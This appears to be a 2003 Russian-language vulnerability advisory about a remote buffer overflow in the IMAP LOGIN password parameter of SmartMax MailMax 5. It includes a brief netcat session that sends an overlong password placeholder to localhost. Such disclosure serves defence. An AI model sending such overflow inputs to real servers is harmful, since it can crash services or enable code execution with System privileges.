Удаленное переполнение буфера в MailMax e-mail server

Дата публикации:
16.04.2003
Всего просмотров:
743
Опасность:
Наличие исправления:
Количество уязвимостей:
1
CVSSv2 рейтинг:
CVE ID:
Нет данных
Вектор эксплуатации:
Воздействие:
CWE ID:
Нет данных
Наличие эксплоита:
Нет данных
Уязвимые продукты:
Описание: Переполнение буфера обнаружено в SmartMax Software's MailMax e-mail server. Удаленный пользователь может аварийно завершить работу сервера. Также удаленный пользователь может выполнить произвольный код с System привилегиями.

Переполнение происходит, когда удаленный пользователь посылает специально сформированное значение параметра password для команды IMAP Login:

nc 127.0.0.1 143
* OK IMAP4rev1 SmartMax IMAPMax 5 Ready
0000 CAPABILITY
* CAPABILITY IMAP4rev1
0000 OK CAPABILITY completed
0001 LOGIN "mail@mail.com" "A..[50] ..A"
0001 NO Invalid user name or password.
0001 NO Invalid user name or password.
Уязвимость обнаружена в MailMax 5

Ссылки: Buffer Overflow Vulnerability Found in MailMax Version 5
или введите имя

CAPTCHA